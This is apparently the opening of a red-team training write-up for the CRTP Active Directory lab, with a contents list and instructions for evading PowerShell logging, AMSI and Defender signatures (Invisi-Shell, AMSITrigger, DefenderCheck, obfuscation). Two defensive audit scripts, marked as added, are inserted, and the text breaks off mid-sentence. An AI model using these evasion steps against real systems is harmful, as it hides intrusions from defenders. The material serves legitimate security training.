Certified Red Team Professional - Lab Notes
482 pages
© All Rights Reserved

Certified Red Team Professional

Disclaimer

Before proceeding with any red team or penetration testing activities, it is essential to obtain explicit
permission from the relevant authorities and ensure compliance with all applicable laws and regulations.
Unauthorized access to systems or data is illegal and unethical. This document is intended for educational
purposes only and should not be used for malicious activities.

The information contained in this document is accurate to the best of my knowledge and is provided with
the intention of educating and informing readers about red team operations and penetration testing
techniques. However, the reader is advised to conduct their own research and verification.
Contents

Introduction (p. 10)
  Intended Audience (p. 10)
    Who Should Read This Document (p. 10)
  Prerequisites (p. 10)
  Course Approach and Methodology (p. 10)
    Key Features of the Course Approach (p. 11)
Active Directory and PowerShell: Foundations for Red Teaming (p. 12)
  Active Directory (p. 12)
  PowerShell (p. 14)
    Key Features of PowerShell (p. 14)
    Benefits of Using PowerShell (p. 15)
  Enhanced Logging and Security Features in PowerShell (p. 15)
    System-Wide Transcription (p. 15)
    Script Block Logging (p. 16)
    Antimalware Scan Interface (AMSI) (p. 16)
    Constrained Language Mode (CLM) (p. 16)
    Benefits of Enhanced Logging and Security Features (p. 16)
  Bypassing PowerShell Security (p. 17)
    Avoiding Command History (p. 17)
    Bypassing Script Block Logging (p. 17)
    Evading Antimalware Scan Interface (AMSI) (p. 17)
    Utilizing .NET Framework (p. 17)
    Dynamic Code Execution (p. 17)
    Memory-Resident Execution (p. 18)
  How Invisi-Shell Works (p. 18)
    Hooking .NET Assemblies (p. 18)
    Using CLR Profiler API (p. 18)
    Common Language Runtime (CLR) Profiler (p. 18)
  Using Invisi-Shell (p. 18)
    Capabilities of Invisi-Shell (p. 18)
    With Admin Privileges (p. 19)
    With Non-Admin Privileges (p. 19)
    Completing the Clean-Up (p. 19)
  Advanced Techniques for Bypassing PowerShell Security Controls (p. 19)
    Loading Scripts in Memory (p. 19)
    Bypassing Signature-Based Detection by Windows Defender (p. 20)
Lab Environment (p. 22)
  Assume Breach Execution Cycle (p. 22)
    Red Teaming (p. 22)
    Insider Attack Simulation (p. 22)
    Blue Teaming (p. 23)
    Execute Post Breach (p. 23)
    Monitor Emerging Threats (p. 23)
    Wargame Exercises (p. 23)
  Target Environment (p. 23)
    Moneycorp (p. 23)
    Moneycorp Environment Details (p. 23)
    Lab Access (p. 24)
    Lab Tools and Resources (p. 24)
    IP Addresses (p. 24)
    Insider Attack Simulation Phase (p. 25)
Active Directory Enumeration (p. 27)
  Tools for Enumeration (p. 27)
  Enumeration Techniques (p. 28)
  Loading the Active Directory Module (p. 28)
  Loading the PowerView Script (p. 28)
  Domain Enumeration (p. 29)
    Using AD Module (p. 29)
    Using PowerView (p. 36)
    Using .NET Methods and nslookup (p. 41)
  User Enumeration (p. 43)
    Using AD Module (p. 43)
    Using PowerView (p. 45)
  Computer Enumeration (p. 46)
    Using AD Module (p. 46)
    Using PowerView (p. 47)
  Group Enumeration (p. 48)
    Using AD Module (p. 48)
    Using PowerView (p. 50)
  Sessions Enumeration (p. 58)
    Using PowerView (p. 58)
  Shares Enumeration (p. 59)
    Using PowerView (p. 59)
  GPO Enumeration (p. 60)
    Using PowerView (p. 60)
  ACL Enumeration (p. 67)
    Access Control Model (p. 67)
    Using PowerView (p. 67)
  User Hunting (p. 129)
    Using PowerView (p. 129)
Local Privilege Escalation (p. 138)
  Disable Defender using PowerShell (p. 142)
Jenkins Feature Abuse (p. 143)
  Getting a Reverse Shell (p. 143)
    Tools Required (p. 143)
Domain Enumeration using BloodHound (p. 146)
  Introduction to BloodHound (p. 146)
  Components of BloodHound (p. 146)
    SharpHound (p. 146)
    BloodHound Interface (p. 146)
  Setting up BloodHound Environment (p. 146)
    Prerequisites (p. 146)
    Installation of neo4j Database (p. 146)
  How BloodHound Collects Data (p. 148)
    LDAP Enumeration (p. 148)
    SMB and RPC Enumeration (p. 148)
    Active Directory Web Services (ADWS) (p. 148)
    Event Logs (p. 148)
  Types of Data Collected (p. 149)
  Data Collection Methods (p. 149)
  Using SharpHound (p. 149)
  Issue with Derivative Local Admin and BloodHound 4.2.0 (p. 153)
Lateral Movement (p. 157)
  The Stages of Lateral Movement (p. 157)
    Reconnaissance (p. 157)
    Credential Dumping (p. 158)
    Gaining Access (p. 159)
  PowerShell Remoting (p. 159)
    Overview of PowerShell Remoting (p. 159)
    Enabling PowerShell Remoting (p. 159)
    Using PowerShell Remoting (p. 160)
  Dumping LSASS Credentials (p. 161)
    Dumping Credentials from LSASS (p. 161)
  Overpass the Hash Attacks (p. 162)
  DCSync Attack (p. 163)
  NetLoader (p. 163)
  Lateral Movement - 1 (p. 164)
    Dumping Credentials (p. 164)
    OverPass the Hash Attack (p. 175)
  Lateral Movement - 2 (Using Derivative Admin) (p. 183)
    Dumping Credentials on DCORP-ADMINSRV (p. 185)
    OverPass The Hash (p. 190)
Domain Persistence (p. 205)
  Introduction to Kerberos (p. 205)
    Key Concepts of Kerberos (p. 205)
    How Kerberos Works (p. 206)
  DCSync Attack (p. 209)
    Enumeration (p. 209)
    Execution (p. 212)
  Dumping All Hashes from Domain Controller (p. 223)
    Using Invoke-Mimi (p. 223)
    Using SafetyKatz (p. 236)
  Golden Ticket Attack (p. 251)
    Execution (p. 251)
    Persistence (p. 260)
  Silver Ticket Attack (p. 260)
    Stealthiness of Silver Tickets (p. 261)
    Dumping Credentials of the Service Accounts (p. 261)
    Execution (p. 266)
    Persistence (p. 279)
  Diamond Ticket Attack (p. 279)
    Execution (p. 280)
    Persistence (p. 283)
  Skeleton Key Attack (p. 283)
    Requirements (p. 283)
    Execution (p. 283)
    Persistence (p. 286)
  DSRM Attack (p. 286)
    Persistence (p. 289)
  Persistence using ACL (p. 289)
    AdminSDHolder (p. 289)
    Rights Abuse (p. 293)
    Using ACLs - Security Descriptors (p. 299)
  Remote Registry Backdoor (p. 305)
Domain Privilege Escalation (p. 311)
  Kerberoasting (p. 311)
    How Kerberoasting Works (p. 311)
    Enumeration (p. 311)
    Performing the Attack (p. 323)
    Mitigation (p. 327)
  Targeted Kerberoasting (AS-REP Roasting) (p. 327)
    How AS-REP Roasting Works (p. 327)
    Enumeration (p. 327)
  Kerberoasting - SET SPN (p. 348)
  Kerberos Delegation (p. 349)
    Unconstrained Delegation (p. 349)
  Constrained Delegation (p. 359)
    Kerberos Only (p. 360)
    Protocol Transition (p. 360)
    Enumeration (p. 361)
    Performing the Attack (p. 364)
  Resource-based Constrained Delegation (p. 381)
Cross Domain Attacks (p. 392)
  Kerberos across Trusts (p. 392)
  Privilege Escalation to Enterprise Admins Abusing SID History and Trust Key (p. 394)
    SID History (p. 394)
  Getting the RC4 or AES Hash of the Trust Key (p. 394)
    DCSync Attack (p. 394)
    Invoke-Mimi (p. 399)
  Forging Inter-Realm TGT (p. 413)
    Using BetterSafetyKatz.exe (p. 413)
    Using Rubeus (p. 415)
  Privilege Escalation to Enterprise Admins using krbtgt (p. 421)
    Using BetterSafetyKatz.exe (p. 422)
Cross Forest Attacks (p. 428)
  Getting the RC4 or AES Hash of the Trust Key (p. 428)
    DCSync Attack (p. 428)
    Invoke-Mimi (p. 432)
  Forging Inter-Realm TGT (p. 445)
ADCS Abuse (p. 449)
  Components of ADCS (p. 449)
  Enumerating ADCS (p. 449)
  Common Misconfigurations for Domain Privilege Escalation Path (p. 451)
  Enrollee Can Enroll Certificate for Any User (p. 451)
    Explanation of the Misconfiguration (p. 451)
    Escalation to Domain Administrator (p. 462)
  Escalation to Enterprise Administrator (p. 466)
MS SQL Servers Abuse (p. 471)
  Enumeration (p. 471)
    Listing SQL Servers (p. 471)
    Test Connectivity (p. 472)
    Extracting Information (p. 473)
  Abusing MSSQL Servers Database Links (p. 474)
    Enumeration (p. 474)
  Getting a Reverse Shell (p. 478)
Detection and Defense (p. 480)
  Protect and Limit Domain Admins (p. 480)
  Protected Users Group (p. 480)
    Prerequisites (p. 480)
    Protections Applied by Active Directory (p. 480)
    Device Protections for Signed-in Protected Users (p. 480)
    Domain Controller Protections for Protected Users (p. 481)
  Isolate Administrative Workstations (p. 481)
    Privileged Administrative Workstations (p. 481)
    Secure Local Administrators (p. 481)
  Time-Bound Administration (p. 482)
    Just in Time (JIT) Administration (p. 482)
    Just Enough Administration (JEA) (p. 482)
  Tier Model (p. 482)
Introduction
This document outlines the various attacks and techniques used during the Certified Red Team
Professional (CRTP) lab. It covers the setup of the lab environment, the methods employed for
enumeration, privilege escalation, lateral movement, persistence, and evasion, as well as the findings and
recommendations based on the lab results.

Intended Audience
This document is designed for cybersecurity professionals and enthusiasts who have completed the
Certified Red Team Professional (CRTP) lab. The course assumes no previous experience with Active
Directory security but expects that the reader has a foundational understanding of Active Directory
concepts.

Who Should Read This Document


1. Beginner Cybersecurity Professionals: Individuals new to the field of cybersecurity who wish to
gain practical experience in Red Teaming and Active Directory security.

2. IT Professionals: System administrators and IT staff who have a basic understanding of Active
Directory and are looking to enhance their knowledge of security practices and Red Team
techniques.

3. Security Enthusiasts: Hobbyists and learners with a basic grasp of Active Directory who are
interested in exploring offensive security methods and improving their skill set.

4. Students: Individuals pursuing education in cybersecurity or related fields who seek practical,
hands-on experience with Red Teaming and Active Directory environments.

5. Red Team Aspirants: Professionals aiming to specialize in Red Team operations and wishing to
build a strong foundation in Active Directory security and attack techniques.

Prerequisites
• Basic knowledge of Active Directory concepts (e.g., domains, users, groups, and organizational
units)

• Familiarity with general networking concepts and Windows operating systems

• Basic understanding of command-line interfaces and scripting

This document will guide you through the various attacks and techniques used during the CRTP lab,
providing detailed steps, tools, and observations to enhance your learning experience and practical skills
in Red Teaming.

Course Approach and Methodology


The Certified Red Team Professional (CRTP) lab simulates a real-world Red Team operation, providing a
practical and immersive learning experience. Unlike traditional penetration testing courses that rely
heavily on exploits and exploitation frameworks, this lab emphasizes the use of built-in tools and focuses
on functionality abuse within Active Directory environments. The objective is to demonstrate how
attackers can leverage legitimate features and functionalities to achieve their goals without the need for
external exploitation tools.

Key Features of the Course Approach


• Real-World Simulation: The lab environment closely mimics real-world scenarios, offering hands-
on experience with practical Red Team operations.

• Adversary Emulation: We will emulate an adversary who has already gained a foothold in the
target domain. This involves starting with limited access and escalating privileges through various
techniques.

• Use of Built-In Tools: Emphasis is placed on utilizing native tools and commands available within
the Windows operating system and Active Directory. This includes tools like PowerShell, net
commands, and built-in Windows utilities. The goal is to avoid touching the disk on any target
server as much as possible to minimize detection.

• Functionality Abuse: The course focuses on abusing legitimate functionalities and components
within Active Directory, including AD components and trusts, to achieve various attack objectives.
Techniques include leveraging misconfigurations, exploiting default settings, and abusing user
privileges. We will not rely on any patchable exploits, highlighting the importance of
understanding and manipulating inherent system features.

• Windows as the Attack Platform: All attacks will be conducted using built-in Windows
management tools, avoiding Unix or Linux tools and operating systems. This approach enhances
stealth and flexibility, as it leverages the native environment of the target systems.

• No Exploits or Exploitation Frameworks: Unlike other courses that rely on Metasploit or other
exploitation frameworks, this lab avoids the use of external exploits. The emphasis is on
understanding and manipulating the inherent features of the system.

Learning Outcomes:

• Gain a deep understanding of how attackers can operate within a network using only built-in
Windows tools.

• Develop skills to identify and exploit misconfigurations and weaknesses in Active Directory and its
components.

• Learn to think like an attacker by leveraging functionality abuse to achieve persistence, lateral
movement, and privilege escalation.

• Understand the techniques to minimize footprint by avoiding disk access and relying on memory-
resident operations.

• Enhance stealth and flexibility by exclusively using Windows as the attack platform.

By focusing on these methods, the CRTP lab ensures that students gain practical, applicable skills that are
highly relevant in real-world Red Team engagements.

Active Directory and PowerShell: Foundations for Red Teaming

Active Directory
Active Directory (AD) is a directory service used to manage Windows networks. It serves as a centralized
repository for storing information about objects on the network and makes this information easily
accessible to users and administrators.

Key Components of Active Directory:

• Schema: Defines objects and their attributes within the directory.

• Query and Index Mechanism: Provides searching and publication of objects and their properties,
facilitating efficient retrieval of information.

• Global Catalog: Contains information about every object in the directory, enabling cross-domain
searches and authentication.

• Replication Service: Distributes information across domain controllers, ensuring consistency and
availability of directory data.

Active Directory Structure:

Forests, domains, and organizational units (OUs) are the fundamental components of any Active Directory
structure.

• Forests: A security boundary that may contain multiple domains. It provides a means of
partitioning and organizing directory data.

• Domains: Logical groupings of objects within a forest, representing administrative boundaries.
Each domain may contain multiple OUs.

• Organizational Units (OUs): Containers used for organizing and managing objects within a domain.
OUs provide a hierarchical structure for applying Group Policy settings and delegating
administrative tasks.

Active Directory enables centralized, secure management of an entire network, whether it spans a
building, a city, or multiple locations worldwide. Understanding its components and structure is essential
for effective Red Teaming operations within Windows environments.

The core of any Windows Domain is the Active Directory Domain Service (AD DS). This service acts as a
catalogue that holds the information of all of the "objects" that exist on your network. Amongst the many
objects supported by AD, we have users, groups, machines, printers, shares and many others. Let's look
at some of them:

Users

Users are one of the most common object types in Active Directory. Users are one of the objects known
as security principals, meaning that they can be authenticated by the domain and can be assigned
privileges over resources like files or printers. You could say that a security principal is an object that can
act upon resources in the network.

Users can be used to represent two types of entities:

• People: users will generally represent persons in your organisation that need to access the
network, like employees.

• Services: you can also define users to be used by services like IIS or MSSQL. Every single service
requires a user to run, but service users are different from regular users as they will only have the
privileges needed to run their specific service.

Machines

Machines are another type of object within Active Directory; for every computer that joins the Active
Directory domain, a machine object will be created. Machines are also considered "security principals"
and are assigned an account just as any regular user. This account has somewhat limited rights within the
domain itself.

The machine accounts themselves are local administrators on the assigned computer. They are generally
not supposed to be accessed by anyone except the computer itself, but as with any other account, if you
have the password, you can use it to log in.

Note: Machine account passwords are rotated automatically and generally consist of 120 random
characters.

Identifying machine accounts is relatively easy. They follow a specific naming scheme. The machine
account name is the computer's name followed by a dollar sign. For example, a machine named DC01 will
have a machine account called DC01$.

Security Groups

If you are familiar with Windows, you probably know that you can define user groups to assign access
rights to files or other resources to entire groups instead of single users. This allows for better
manageability as you can add users to an existing group, and they will automatically inherit all of the
group's privileges. Security groups are also considered security principals and, therefore, can have
privileges over resources on the network.

Groups can have both users and machines as members. If needed, groups can include other groups as
well.

Several groups are created by default in a domain that can be used to grant specific privileges to users. As
an example, here are some of the most important groups in a domain:
Security Group       Description

Domain Admins        Users of this group have administrative privileges over the entire domain. By
                     default, they can administer any computer on the domain, including the DCs.

Server Operators     Users in this group can administer Domain Controllers. They cannot change any
                     administrative group memberships.

Backup Operators     Users in this group are allowed to access any file, ignoring their permissions.
                     They are used to perform backups of data on computers.

Account Operators    Users in this group can create or modify other accounts in the domain.

Domain Users         Includes all existing user accounts in the domain.

Domain Computers     Includes all existing computers in the domain.

Domain Controllers   Includes all existing DCs on the domain.
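Because membership of the groups in this table is what a defender reviews most often, here is an added audit script (not from the lab notes or any course tool) that lists the members of those groups, including members inherited through nested groups, using only the ADSI searcher built into Windows. It assumes it runs as a domain user on a domain-joined host; the group names are taken from the table, the matching-rule OID is the standard LDAP_MATCHING_RULE_IN_CHAIN, and nothing is written to the directory.

```powershell
# Added example (not from the CRTP lab notes): list members, including nested members, of the
# privileged built-in groups described above, using System.DirectoryServices (ADSI).
# Read-only LDAP queries; works as any authenticated domain user on a domain-joined host.

$privilegedGroups = 'Domain Admins', 'Server Operators', 'Backup Operators', 'Account Operators'

function Get-PrivilegedGroupMembers {
    param([string[]]$GroupNames = $privilegedGroups)

    # Resolve the domain naming context from RootDSE so the script is not tied to one lab domain.
    $domainDN   = [string]([ADSI]'LDAP://RootDSE').defaultNamingContext
    $searchRoot = [ADSI]"LDAP://$domainDN"

    foreach ($name in $GroupNames) {
        $groupSearch = New-Object System.DirectoryServices.DirectorySearcher(
            $searchRoot, "(&(objectCategory=group)(cn=$name))")
        $group = $groupSearch.FindOne()
        if (-not $group) { Write-Warning "Group '$name' not found in $domainDN"; continue }
        $groupDN = [string]$group.Properties['distinguishedname'][0]

        # LDAP_MATCHING_RULE_IN_CHAIN (OID 1.2.840.113556.1.4.1941) makes the DC expand nested
        # membership server-side, so a user placed in a group that is itself a member of
        # Domain Admins is reported. Membership granted only via primaryGroupID is not
        # visible through memberOf and would need a separate check.
        $filter = "(memberOf:1.2.840.113556.1.4.1941:=$groupDN)"
        $memberSearch = New-Object System.DirectoryServices.DirectorySearcher($searchRoot, $filter)
        $memberSearch.PageSize = 500
        [void]$memberSearch.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'objectcategory'))

        foreach ($m in $memberSearch.FindAll()) {
            $category = [string]$m.Properties['objectcategory'][0]
            # Machine accounts (names ending in '$') have objectCategory CN=Computer,...;
            # nested groups show up as CN=Group,...; everything else is treated as a user.
            if     ($category -like 'CN=Computer*') { $type = 'Machine' }
            elseif ($category -like 'CN=Group*')    { $type = 'Group' }
            else                                    { $type = 'User' }

            [pscustomobject]@{
                Group  = $name
                Member = [string]$m.Properties['samaccountname'][0]
                Type   = $type
            }
        }
    }
}

Get-PrivilegedGroupMembers | Sort-Object Group, Type, Member | Format-Table -AutoSize
```

Any machine account or unexpected nested group appearing under Domain Admins, Server Operators, Backup Operators or Account Operators is worth an explanation, since each of those groups can administer domain controllers or bypass file permissions as the table describes.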

Default containers in AD

• Builtin: Contains default groups available to any Windows host.

• Computers: Any machine joining the network will be put here by default. We can move them if
needed.

• Domain Controllers: Default OU that contains the DCs in your network.

• Users: Default users and groups that apply to a domain-wide context.

• Managed Service Accounts: Holds accounts used by services in your Windows domain.

PowerShell
PowerShell is a powerful scripting language and command-line shell developed by Microsoft. It is designed
to automate administrative tasks and provide a more efficient way to manage Windows environments.
PowerShell combines the flexibility of scripting with the power of the .NET Framework, allowing
administrators to automate repetitive tasks, manage system configurations, and streamline
administrative workflows.

Key Features of PowerShell


• Object-Oriented: PowerShell treats everything as an object, including files, folders, registry keys,
and even commands themselves. This object-oriented approach allows for seamless integration
with other technologies and simplifies automation tasks.
• Pipeline: PowerShell features a pipeline mechanism that enables the output of one command to
be passed as input to another command. This allows for the chaining of commands together,
creating powerful one-liners and facilitating complex data manipulation.

• Cmdlets: PowerShell uses cmdlets (pronounced "command-lets") as its primary mechanism for
performing tasks. Cmdlets are small, single-function commands that follow a Verb-Noun naming
convention (e.g., Get-Process, Set-Item). There are hundreds of built-in cmdlets for managing
various aspects of the Windows operating system, and administrators can also create custom
cmdlets to extend functionality.

• Scripting Language: PowerShell is a full-featured scripting language with support for variables,
loops, conditional statements, functions, and error handling. This makes it suitable for writing
complex scripts and automation workflows.

• Integration with .NET Framework: PowerShell provides seamless integration with the .NET
Framework, allowing administrators to leverage the extensive library of .NET classes and methods
in their scripts. This enables access to advanced system functions and external APIs, expanding
the capabilities of PowerShell scripts.

Benefits of Using PowerShell


• Automation: PowerShell enables administrators to automate repetitive tasks, reducing manual
effort and increasing efficiency. Tasks such as user provisioning, system configuration, and log
analysis can be easily automated using PowerShell scripts.

• Standardization: PowerShell provides a standardized framework for managing Windows
environments, ensuring consistency and reliability across systems. Administrators can use the
same set of commands and scripts to manage different servers and workstations, simplifying
administration tasks.

• Remote Management: PowerShell supports remote administration, allowing administrators to
manage Windows systems remotely over the network. This enables centralized management of
distributed environments and facilitates troubleshooting and maintenance tasks.

• Extensibility: PowerShell is highly extensible, with support for modules, snap-ins, and custom
cmdlets. Administrators can extend the functionality of PowerShell by installing additional
modules or writing their own custom cmdlets to meet specific requirements.

Enhanced Logging and Security Features in PowerShell


PowerShell incorporates a range of advanced logging and security features designed to enhance visibility,
detect malicious activity, and enforce security policies across Windows environments. These features play
a crucial role in maintaining system integrity, mitigating risks, and safeguarding against cybersecurity
threats.

System-Wide Transcription
PowerShell supports system-wide transcription logging, which captures all input and output from
PowerShell sessions across the entire system. This comprehensive logging capability records command
execution, script output, and interactive sessions, providing a detailed audit trail of PowerShell activity.
System-wide transcription logging is invaluable for compliance, forensic analysis, and incident response
purposes.

Script Block Logging


Script block logging captures the contents of PowerShell script blocks, including commands, parameters,
and additional code executed within the block. By logging script block activity, administrators can monitor
script execution, detect malicious behavior, and identify security incidents involving unauthorized script
execution or exploitation attempts.

Antimalware Scan Interface (AMSI)


PowerShell integrates with the Antimalware Scan Interface (AMSI), a standard interface that enables
antivirus and security products to scan script content for malicious code. By leveraging AMSI, PowerShell
can provide real-time threat detection and mitigation capabilities, allowing security solutions to analyze
script behavior and detect malicious activity before it executes.

Constrained Language Mode (CLM)


Constrained Language Mode (CLM) is a security feature in PowerShell that restricts the use of potentially
dangerous language elements and cmdlets. Integrated with AppLocker and Windows Defender
Application Control (WDAC, formerly Device Guard), CLM helps prevent the execution of malicious scripts
and unauthorized code by enforcing a restricted execution environment. CLM is particularly effective in
mitigating script-based attacks and preventing the exploitation of PowerShell vulnerabilities.
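The four controls above are only useful if they are actually enforced, so here is an added audit script (not from the lab notes or any course tool) that reports which of them are in force on the local host and then reviews what script block logging has recently captured. It reads the standard PowerShell policy registry keys (ScriptBlockLogging, ModuleLogging, Transcription under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell), reports the session language mode, and pulls event 4104 records from the Microsoft-Windows-PowerShell/Operational log. The keyword pattern used to flag events is a constructed heuristic, not a Microsoft signature.

```powershell
# Added audit script (not from the CRTP lab notes): report the state of the PowerShell logging
# and hardening controls on this host, then review recent script block log entries.
# Everything here is read-only. Policy keys are readable by any user; reading the Operational
# event log may require local administrator rights.

$policyBase = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PolicyValue {
    # Return one value from a PowerShell policy subkey, or $null when the policy is not set.
    param([string]$SubKey, [string]$Name)
    $path = Join-Path $policyBase $SubKey
    if (-not (Test-Path $path)) { return $null }
    $item = Get-ItemProperty -Path $path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Get-PowerShellHardeningState {
    # FullLanguage means Constrained Language Mode is not in force for this session; when
    # AppLocker/WDAC enforce it, the value is ConstrainedLanguage.
    [pscustomobject][ordered]@{
        ScriptBlockLogging  = (Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging       = (Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1
        Transcription       = (Get-PolicyValue 'Transcription' 'EnableTranscripting') -eq 1
        TranscriptDirectory = Get-PolicyValue 'Transcription' 'OutputDirectory'
        LanguageMode        = [string]$ExecutionContext.SessionState.LanguageMode
    }
}

function Get-SuspiciousScriptBlocks {
    # Script block logging writes event 4104 to the PowerShell Operational log. Return recent
    # entries whose captured code touches both .NET reflection and AMSI, a combination that a
    # reviewer should read by hand. The pattern is a constructed heuristic for this example.
    param([int]$MaxEvents = 500)
    $reflection = 'System\.Reflection|\.GetField\(|\.GetType\('
    Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -eq 4104 -and $_.Message -match $reflection -and $_.Message -match 'amsi' } |
        Select-Object TimeCreated, Id,
            @{ Name = 'Snippet'; Expression = { (($_.Message -split "`r?`n")[0..2]) -join ' ' } }
}

Get-PowerShellHardeningState | Format-List
Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

A host where all three policy values read False and the language mode is FullLanguage is exactly the configuration in which the bypass tooling discussed later in these notes leaves no trace; enabling the policies via Group Policy and forwarding the Operational log to a collector is what turns the features described above into usable evidence.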

Benefits of Enhanced Logging and Security Features


• Improved Visibility and Control: System-wide transcription, script block logging, and other
logging features provide administrators with enhanced visibility into PowerShell activity, enabling
them to monitor and control script execution across the system.

• Advanced Threat Detection: Integration with AMSI and the enforcement of CLM help
organizations detect and mitigate script-based threats, including malware, ransomware, and
malicious scripts. By scanning script content and restricting potentially dangerous operations,
PowerShell enhances the overall security posture of Windows environments.

• Regulatory Compliance: Enhanced logging and security features support compliance with
industry regulations and cybersecurity standards by providing comprehensive audit trails, threat
detection capabilities, and proactive security measures. Organizations can demonstrate adherence
to security policies and regulatory requirements by implementing robust logging and security
controls in PowerShell.

• Risk Mitigation and Incident Response: PowerShell's advanced logging and security features
enable organizations to mitigate risks, respond to security incidents, and prevent unauthorized
access or malicious activity. By leveraging transcription logging, script block logging, AMSI
integration, and CLM enforcement, organizations can proactively protect against cybersecurity
threats and maintain system integrity.
Bypassing PowerShell security
In the lab, we utilize Invisi-Shell for bypassing PowerShell security mechanisms. Invisi-Shell is a
sophisticated tool designed to evade PowerShell security mechanisms, allowing attackers to execute
PowerShell commands without triggering detection and logging features. Here’s a detailed look at how
Invisi-Shell achieves this:

Avoiding Command History


Invisi-Shell can execute PowerShell commands in a way that avoids recording them in the command
history. This is typically done by using techniques that bypass the standard input methods where
command history is logged. By avoiding the command history, Invisi-Shell reduces the chances of its
actions being discovered through historical command analysis.

Bypassing Script Block Logging


Script Block Logging is a powerful feature in PowerShell that logs the contents of all script blocks. Invisi-
Shell bypasses this by executing commands in a manner that doesn’t get captured by the logging
mechanism. This can be achieved through techniques such as dynamic code execution, obfuscation, or
leveraging APIs that do not trigger logging.

Evading AntiMalware Scan Interface (AMSI)


AMSI is designed to scan PowerShell scripts for malicious content before execution. Invisi-Shell can bypass
AMSI by:

• Injecting commands directly into memory, thus avoiding the standard AMSI scanning process.

• Using obfuscation techniques to modify the script content so that it is not recognized as malicious
by AMSI.

• Disabling or modifying the AMSI DLL in memory to prevent it from scanning the PowerShell
scripts.

Utilizing .NET Framework


Invisi-Shell often leverages the .NET Framework to execute PowerShell commands. By using .NET classes
and methods directly, it can bypass some of the built-in security features of PowerShell. This approach
allows the execution of commands without going through the standard PowerShell command pipeline,
thereby avoiding logging and detection.

Dynamic Code Execution


Invisi-Shell employs dynamic code execution techniques, such as reflection, to run PowerShell commands.
These methods involve generating and executing code at runtime, which can bypass static analysis and
logging mechanisms that are typically applied to scripts and commands entered directly into the
PowerShell prompt.

Memory-Resident Execution
Invisi-Shell focuses on executing commands directly in memory, avoiding disk writes that can be logged
and detected by endpoint security solutions. By operating in memory, it reduces its footprint and the
chances of being detected by traditional file-based monitoring and logging systems.

In the lab, we will use Invisi-Shell, a tool designed to bypass PowerShell's security controls. Invisi-Shell
employs advanced techniques to evade logging and detection mechanisms, allowing us to execute
PowerShell commands stealthily.

Invisi-Shell GitHub Repository

How Invisi-Shell Works


Hooking .NET Assemblies
Invisi-Shell hooks into essential .NET assemblies such as System.Management.Automation.dll and
System.Core.dll. By doing so, it bypasses the standard logging mechanisms that PowerShell employs. This
allows commands to be executed without being recorded in script block logs or other logging facilities.

Using CLR Profiler API


The tool leverages the CLR Profiler API to perform these hooks. The CLR Profiler API allows the profiler
DLL to interact with the CLR at runtime, providing a powerful means to modify the behavior of .NET
applications, including PowerShell.

Common Language Runtime (CLR) Profiler


A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that
receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded
by the CLR at runtime, enabling it to monitor and manipulate the execution of .NET code. This mechanism
is what Invisi-Shell uses to inject its hooks and bypass logging.

Using Invisi-Shell
In the lab, we use an obfuscated version of Invisi-Shell to bypass PowerShell security controls. The
obfuscation ensures that the tool remains undetected by security mechanisms that would normally flag
the script from the GitHub repository.

Capabilities of Invisi-Shell
Incapacitating System-Wide Transcription

Invisi-Shell disables system-wide transcription logging, preventing the capture of all input and output from
PowerShell sessions. This means that commands executed via Invisi-Shell will not be recorded in
transcription logs, ensuring stealthy operation.

Bypassing Script Block Logging
Script block logging, which captures the contents of PowerShell script blocks, is effectively bypassed by
Invisi-Shell. This prevents detailed logging of the commands and scripts executed, making it difficult for
administrators to monitor or review the executed script content.

Evading AntiMalware Scan Interface (AMSI)


Invisi-Shell circumvents AMSI, a feature that scans PowerShell scripts for malicious content before
execution. By bypassing AMSI, Invisi-Shell allows scripts to run without being scanned or flagged by anti-
malware solutions, ensuring that potentially malicious commands execute undetected.

To bypass PowerShell security controls in the lab, we will use Invisi-Shell. Depending on the privileges
available, different scripts are used to initiate Invisi-Shell.

With Admin Privileges


1. Execute RunWithPathAsAdmin.bat

o This script is designed to run Invisi-Shell with administrative privileges, allowing it to
perform the necessary hooks and bypass security controls effectively.

With Non-Admin Privileges

1. Execute RunWithRegistryNonAdmin.bat

o This script enables Invisi-Shell to operate with non-administrative privileges, using
alternative methods to bypass logging and other security mechanisms.

Completing the Clean-Up


1. After executing the required commands, type exit in the new PowerShell session.

o This ensures that the session is properly terminated and any temporary modifications
made by Invisi-Shell are cleaned up.

By following these steps, Invisi-Shell can be used to execute PowerShell commands without triggering
logging mechanisms, aiding in understanding and demonstrating bypass techniques in a controlled lab
environment.

Advanced Techniques for Bypassing PowerShell Security Controls


In the lab, we use various advanced techniques and tools to bypass PowerShell security mechanisms,
including AMSI and signature-based detections by Windows Defender. These methods ensure that our
scripts remain undetected and can execute without interference from security tools.

Loading Scripts in Memory


To avoid detection by AMSI, we can load PowerShell scripts directly into memory. This method bypasses
AMSI scans that are typically triggered by on-disk script execution, ensuring that the scripts run without
being flagged by AMSI.

Bypassing Signature-Based Detection by Windows Defender
Windows Defender employs signature-based detection to identify and block known malicious PowerShell
scripts. Here are the tools and techniques we use to bypass these detections:

AMSITrigger
AMSITrigger GitHub Repository

AMSITrigger helps identify the exact part of a PowerShell script that triggers AMSI detections. By
pinpointing the specific code segments flagged by AMSI, we can modify or obfuscate these parts to evade
detection.

Usage

Identify Detected Parts: use AMSITrigger to find the specific parts of the script that trigger AMSI
detections.
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1

DefenderCheck
DefenderCheck GitHub Repository

DefenderCheck is a tool designed to identify code and strings within a binary or script file that Windows
Defender flags as malicious. By scanning the script with DefenderCheck, we can determine which parts of
the code need to be altered or obfuscated to avoid detection.

Usage

Scan for Defender Flags: use DefenderCheck to scan the script and identify code or strings flagged by
Windows Defender.
DefenderCheck.exe PowerUp.ps1

Full Obfuscation with Invoke-Obfuscation

Invoke-Obfuscation GitHub Repository

For comprehensive obfuscation of PowerShell scripts, we use Invoke-Obfuscation. This tool allows us to
